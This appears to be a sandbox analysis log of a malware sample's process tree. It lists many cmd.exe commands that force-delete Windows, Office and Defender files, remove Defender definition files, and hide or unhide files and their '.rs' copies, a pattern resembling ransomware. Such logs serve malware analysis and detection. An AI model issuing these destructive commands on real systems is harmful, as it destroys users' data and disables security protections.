C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.Office.Tools.v9.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\MF\Active.GRL""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOInstallerUI.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\IdentityCRL\INT\wlidsvcconfig.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VSTO\vstoee.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\ActionsPane3.xsd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\apppatch\AcRes.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Diagnosis\EventStore.db""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\AppInfoDocument\AddIns.store""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VGX\VGX.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\Ole DB\en-US\msdaorar.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\Ole DB\msdadc.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\VGX.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\msadc\adcjavas.inc""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\DiagnosticLogCSP\Collectors\DiagnosticLogCSP_Collector_Autopilot_2021_7_22_3_11_17.etl""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\InkDiv.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\wab32.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\msinfo32.exe.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\wab32.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\PublicAssemblies\extensibility.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\msadc\adcjavas.inc""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Crypto\SystemKeys\e20a5d00f699f8b0d3cc797944b4c0cf_ff33445f-a36e-4a95-8e5f-bca99faf3ebd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\tifffilt.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\ado\adojavas.inc""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-file-l1-2-0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\$Recycle.Bin\S-1-5-18\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\dao360.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-07252021-213748-7-1ff-22000.1.amd64fre.co_release.210604-1628.etl""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\1353bf927c66f7a5fb76355aad5c755e\Microsoft.PowerShell.Activities.ni.dll.aux""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edb00009.jtx""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json.bk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Network\Downloader\edbres00001.jrs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\USOShared\Logs\User\MoNotificationUx.1b56f50e-08ce-47df-a483-15f84754d721.1.etl""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Microsoft\EdgeCore\92.0.902.62\concrt140.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\3cef603f665e94a9f358f763f95140c3\Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationWizard.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4A9377E7E528F7E56B69A81C500ABC24""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\f82b07010423cbe7b7b8280227d2f9d7\Microsoft.Management.Infrastructure.CimCmdlets.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\edb00009.jtx""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\84da3b83d2e6048c428544b929af8250\Microsoft.Windows.Diagnosis.TroubleshootingPack.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\ksc.nlp""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\d1eb31e81aba7252cd685577e9fc3a5f\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\Ole DB\msdaenum.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\VGX.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\VGX.dll.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee100.tlb""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\dao360.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\dao360.dll.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\ksc.nlp""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\0b19a4cfbb94982e1a4db40e81566196\Microsoft.PowerShell.Diagnostics.Activities.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\e338a7229f48b50c0b887709d449005d\Microsoft.PowerShell.Activities.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\30baa7f1ac8eebaf4738bba2dc47d19f\Microsoft.Windows.Diagnosis.Commands.WriteDiagProgress.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\as-IN\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f7bb4c71b47d5c67cb78c9e5bc6498a5\Microsoft.PowerShell.Core.Activities.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\Common Files\System\en-US\wab32res.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\as-IN\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\en-US\wab32res.dll.mui.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files\Common Files\System\ado\adojavas.inc""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Internet Explorer\en-US\hmmapi.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\ado\adojavas.inc.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Internet Explorer\en-US\hmmapi.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft OneDrive\setup\refcount.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\wab32res.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\1783997ceb5d95baa4a1676daac6d764\Microsoft.PowerShell.Workflow.ServiceCore.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft OneDrive\setup\refcount.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\System\wab32res.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\34c7012f0fcab354f0ea5b9292a3f3fd\Microsoft.PowerShell.Utility.Activities.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\wab32res.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Internet Explorer\ExtExport.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\c09fecefc67a805eafc10e51222a9c2a\Microsoft.PowerShell.Commands.Management.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\bfsvc.exe.rs""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\74e194fbcf7bcffd5847e013eb82f42c\Microsoft.WSMan.Management.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Are.docx.lnk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\6f10c0ffd8aa4a469d965a39d26d6909\Microsoft.PowerShell.ConsoleHost.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\ProductReleases\EA92A936-8165-4F03-AFAE-D997D3F16044\x-none.16\MasterDescriptor.x-none.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service\Unknown.Log""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service\Unknown.Log""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\addins\FXSEXT.ecf""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\addins\FXSEXT.ecf.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\msbuild.exe.config""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\bg-BG\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\bg-BG\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\bfsvc.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Microsoft Office\AppXManifest.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\c618ee5dfe32525f6e8938d9ad65ce1f\Microsoft.PowerShell.GraphicalHost.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin.cdp""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\AccountPictures\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Public\AccountPictures\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Public\AccountPictures\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\01ad1622b932709d80880fc458e7fc18\Microsoft.PowerShell.ISECommon.ni.dll""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\ce16fcd9ded96cf208ad74fa6525e7a3\Microsoft.Windows.Diagnosis.SDCommon.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\bg-BG\tipresx.dll.mui""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\EA92A936-8165-4F03-AFAE-D997D3F16044\en-us.16\s641033.hash""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\BitLockerDiscoveryVolumeContents\ar-SA_BitLockerToGo.exe.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Windows\BitLockerDiscoveryVolumeContents\ar-SA_BitLockerToGo.exe.mui.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Windows\BitLockerDiscoveryVolumeContents\ar-SA_BitLockerToGo.exe.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{38CAF553-C71F-4AD9-ABA8-5D6102043795}\mpasbase.vdm""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Security.Resources.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Backup\mpasbase.vdm""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\Diagnosis\EventStore.db""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Diagnosis\EventStore.db.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\PresentationBuildTasks.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\PresentationBuildTasks.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.Build.Conversion.v3.5.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.Build.Conversion.v3.5.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\ca-ES\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\ca-ES\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\EA92A936-8165-4F03-AFAE-D997D3F16044\x-none.16\MasterDescriptor.x-none.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\ca-ES\tipresx.dll.mui""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\865caf7ad9a76a481d421e2dc2de82db\Microsoft.PowerShell.Workflow.ServiceCore.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\napinit\c3aa50eff2962788af3b550ef1363592\napinit.ni.dll""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Public\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Public\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Public\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\apppatch\DirectXApps_FOD.sdb""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\3.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\00507d12-2996-1fba-dcce-3eeac37b19c5.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\Content.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Vbe.Interop\15.0.0.0__71e9bce111e9429c\Microsoft.Vbe.Interop.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\83d62b2fca15d49a7c79f44b50e302af\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.ni.dll""3⤵
-
